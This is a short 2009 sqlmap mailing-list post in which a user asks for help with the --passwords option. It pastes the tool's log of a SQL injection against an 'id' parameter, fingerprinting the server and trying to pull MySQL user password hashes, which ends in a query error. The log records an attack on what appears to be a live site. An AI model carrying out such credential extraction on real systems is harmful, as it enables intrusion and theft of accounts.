[sqlmap-users] problem using --passwords option
Brought to you by:
inquisb
From: Adi M. <adi...@ya...> - 2009-10-05 05:59:27
|
This is the output I got: [08:54:02] [INFO] resuming match ratio '0.9' from session file [08:54:02] [INFO] resuming injection point 'GET' from session file [08:54:02] [INFO] resuming injection parameter 'id' from session file [08:54:02] [INFO] resuming injection type 'numeric' from session file [08:54:02] [INFO] resuming 0 number of parenthesis from session file [08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file [08:54:02] [INFO] resuming union comment '#' from session file [08:54:02] [INFO] resuming union count 9 from session file [08:54:02] [INFO] resuming union position 4 from session file [08:54:02] [INFO] testing connection to the target url [08:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie [08:54:02] [INFO] testing for parenthesis on injectable parameter [08:54:02] [INFO] the back-end DBMS is MySQL web server operating system: Linux Red Hat web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: MySQL 5 [08:54:02] [INFO] fetching database users password hashes [08:54:03] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going bli [08:54:03] [INFO] fetching database users [08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost' [08:54:03] [INFO] fetching number of password hashes for user ''' [08:54:03] [ERROR] Unenclosed ' in 'SELECT IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM mysql.user WHERE user=CHAR()'' [*] shutting down at: 08:54:03 |